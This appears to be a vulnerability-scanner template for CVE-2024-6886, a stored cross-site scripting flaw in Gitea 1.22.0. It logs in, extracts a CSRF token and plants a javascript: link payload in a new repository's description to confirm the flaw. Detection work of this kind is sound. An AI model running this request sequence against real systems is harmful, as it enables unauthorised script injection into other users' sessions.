Description
Gitea 1.22.0 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.
Gitea 1.22.0 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.
id: CVE-2024-6886
info:
name: Gitea 1.22.0 - Cross-Site Scripting
author: soonghee2
severity: medium
description: |
Gitea 1.22.0 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.
impact: |
Authenticated attackers can inject malicious JavaScript into repository descriptions that executes in the context of other users' sessions when they view the repository.
remediation: |
Update Gitea to version 1.22.1 or later to address the stored XSS vulnerability.
reference:
- https://www.exploit-db.com/exploits/52077
- https://nvd.nist.gov/vuln/detail/CVE-2024-6886
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:L
cvss-score: 6.7
cve-id: CVE-2024-6886
cwe-id: CWE-79
epss-score: 0.32968
epss-percentile: 0.98272
cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
vendor: gitea
product: gitea
tags: cve,cve2024,gitea,xss,authenticated,vuln
variables:
username: "{{username}}"
password: "{{password}}"
http:
- raw:
- |
POST /user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user_name={{username}}&password={{password}}
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET /{{username}} HTTP/1.1
Host: {{Hostname}}
- |
POST /repo/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
repo_name={{randstr}}&description=<a%20href="javascript:alert(document.domain)">XSS</a>&_csrf={{csrf_token}}&uid={{uid_name}}
- |
GET /{{username}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_5
words:
- '<a href="javascript:alert(document.domain)">XSS</a>'
- 'gitea'
condition: and
- type: word
part: header_5
words:
- text/html
- type: status
status:
- 200
extractors:
- type: regex
name: csrf_token
group: 1
regex:
- 'name="_csrf" value="([^"]+)"'
internal: true
- type: regex
name: uid_name
group: 1
regex:
- '"uid":\s*(\d+)'
internal: true
# digest: 4b0a00483046022100ec2fe66f9f28ed533d2268f544a62b103bc94f2cc0670ff403ed889ceb840001022100ac5e9a7a4fe5d00991ebd142fa00dd848853b23a04c0028180cddc9dd7889893:922c64590222798bb761d5b6d8e72950
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.